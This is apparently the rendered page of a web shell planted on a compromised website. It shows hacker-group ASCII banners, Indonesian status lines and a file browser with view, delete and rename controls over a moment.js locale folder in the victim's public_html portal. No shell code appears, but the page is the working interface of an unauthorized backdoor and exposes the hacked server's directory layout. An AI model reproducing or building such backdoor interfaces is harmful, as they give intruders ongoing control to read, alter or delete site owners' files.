Hell Yeah Pointer 4
     __    Bye Litespeed   _____ 
     ██████   ██████ ███████████       █████████  █████   ████ █████   ████           
░░██████ ██████ ░░███░░░░░███     ███░░░░░███░░███   ███░ ░░███   ███░            
 ░███░█████░███  ░███    ░███    ░███    ░░░  ░███  ███    ░███  ███              
 ░███░░███ ░███  ░██████████     ░░█████████  ░███████     ░███████               
 ░███ ░░░  ░███  ░███░░░░░███     ░░░░░░░░███ ░███░░███    ░███░░███              
 ░███      ░███  ░███    ░███     ███    ░███ ░███ ░░███   ░███ ░░███             
 █████     █████ █████   █████   ░░█████████  █████ ░░████ █████ ░░████                        
Zona waktu server: America/Sao_Paulo
Waktu server saat ini: 2026-09-05 15:24:04
curdir: / / home / cienp / public_html / portal / vendors / moment / src / locale / [ GO Home ]


Item Name
Size
Date
Permissions
View
Delete
Rename
. 4096 2026-04-17 22:34:39 0755
.. 4096 2026-04-17 22:42:42 0755
af.js 9537 2026-04-17 22:34:22 0644
ar-ma.js 9391 2026-04-17 22:34:36 0644
ar-sa.js 10303 2026-04-17 22:34:15 0644
ar-tn.js 9246 2026-04-17 22:34:22 0644
ar.js 11843 2026-04-17 22:34:36 0644
az.js 10234 2026-04-17 22:34:23 0644
be.js 12190 2026-04-17 22:34:27 0644
bg.js 10277 2026-04-17 22:34:20 0644
bn.js 11156 2026-04-17 22:34:38 0644
bo.js 11944 2026-04-17 22:34:35 0644
br.js 10229 2026-04-17 22:34:39 0644
bs.js 11354 2026-04-17 22:34:30 0644
ca.js 9857 2026-04-17 22:34:25 0644
cs.js 12993 2026-04-17 22:34:32 0644
cv.js 9663 2026-04-17 22:34:37 0644
cy.js 9808 2026-04-17 22:34:26 0644
da.js 9050 2026-04-17 22:34:28 0644
de-at.js 9935 2026-04-17 22:34:28 0644
de.js 9863 2026-04-17 22:34:29 0644
dv.js 9818 2026-04-17 22:34:31 0644
el.js 10941 2026-04-17 22:34:13 0644
en-au.js 9255 2026-04-17 22:34:25 0644
en-ca.js 9156 2026-04-17 22:34:12 0644
en-gb.js 9313 2026-04-17 22:34:33 0644
en-ie.js 9310 2026-04-17 22:34:34 0644
en-nz.js 9256 2026-04-17 22:34:10 0644
eo.js 9609 2026-04-17 22:34:38 0644
es.js 9871 2026-04-17 22:34:38 0644
et.js 10064 2026-04-17 22:34:14 0644
eu.js 9340 2026-04-17 22:34:17 0644
fa.js 10428 2026-04-17 22:34:29 0644
fi.js 10672 2026-04-17 22:34:16 0644
fo.js 9102 2026-04-17 22:34:35 0644
fr-ca.js 9062 2026-04-17 22:34:33 0644
fr-ch.js 9213 2026-04-17 22:34:23 0644
fr.js 9202 2026-04-17 22:34:32 0644
fy.js 9570 2026-04-17 22:34:30 0644
gd.js 9581 2026-04-17 22:34:27 0644
gl.js 9699 2026-04-17 22:34:11 0644
he.js 10633 2026-04-17 22:34:20 0644
hi.js 11305 2026-04-17 22:34:31 0644
hr.js 11483 2026-04-17 22:34:15 0644
hu.js 10838 2026-04-17 22:34:34 0644
hy-am.js 10529 2026-04-17 22:34:36 0644
id.js 9823 2026-04-17 22:34:23 0644
is.js 11212 2026-04-17 22:34:14 0644
it.js 9399 2026-04-17 22:34:37 0644
ja.js 9349 2026-04-17 22:34:19 0644
jv.js 9827 2026-04-17 22:34:17 0644
ka.js 11048 2026-04-17 22:34:20 0644
kk.js 9904 2026-04-17 22:34:11 0644
km.js 9720 2026-04-17 22:34:32 0644
ko.js 9187 2026-04-17 22:34:15 0644
ky.js 9915 2026-04-17 22:34:19 0644
lb.js 11601 2026-04-17 22:34:25 0644
lo.js 9972 2026-04-17 22:34:18 0644
lt.js 11174 2026-04-17 22:34:34 0644
lv.js 10788 2026-04-17 22:34:11 0644
me.js 10891 2026-04-17 22:34:24 0644
mk.js 10299 2026-04-17 22:34:18 0644
ml.js 10634 2026-04-17 22:34:35 0644
mr.js 13011 2026-04-17 22:34:12 0644
ms-my.js 9735 2026-04-17 22:34:30 0644
ms.js 9732 2026-04-17 22:34:16 0644
my.js 10274 2026-04-17 22:34:21 0644
nb.js 9206 2026-04-17 22:34:26 0644
ne.js 11343 2026-04-17 22:34:22 0644
nl.js 9568 2026-04-17 22:34:32 0644
nn.js 9072 2026-04-17 22:34:14 0644
pa-in.js 11495 2026-04-17 22:34:24 0644
pl.js 10763 2026-04-17 22:34:12 0644
pt-br.js 9217 2026-04-17 22:34:28 0644
pt.js 9314 2026-04-17 22:34:10 0644
ro.js 9542 2026-04-17 22:34:39 0644
ru.js 14736 2026-04-17 22:34:17 0644
se.js 9233 2026-04-17 22:34:29 0644
si.js 10062 2026-04-17 22:34:19 0644
sk.js 12149 2026-04-17 22:34:37 0644
sl.js 12737 2026-04-17 22:34:14 0644
sq.js 9418 2026-04-17 22:34:18 0644
sr-cyrl.js 11343 2026-04-17 22:34:21 0644
sr.js 10875 2026-04-17 22:34:33 0644
ss.js 9974 2026-04-17 22:34:36 0644
sv.js 9347 2026-04-17 22:34:30 0644
sw.js 9060 2026-04-17 22:34:39 0644
ta.js 12064 2026-04-17 22:34:25 0644
te.js 10757 2026-04-17 22:34:26 0644
th.js 10268 2026-04-17 22:34:16 0644
tl-ph.js 9095 2026-04-17 22:34:22 0644
tlh.js 10912 2026-04-17 22:34:19 0644
tr.js 9802 2026-04-17 22:34:39 0644
tzl.js 10484 2026-04-17 22:34:17 0644
tzm-latn.js 9106 2026-04-17 22:34:12 0644
tzm.js 9725 2026-04-17 22:34:13 0644
uk.js 12711 2026-04-17 22:34:31 0644
uz.js 9318 2026-04-17 22:34:21 0644
vi.js 9685 2026-04-17 22:34:11 0644
x-pseudo.js 9579 2026-04-17 22:34:24 0644
zh-cn.js 11492 2026-04-17 22:34:27 0644
zh-tw.js 10270 2026-04-17 22:34:28 0644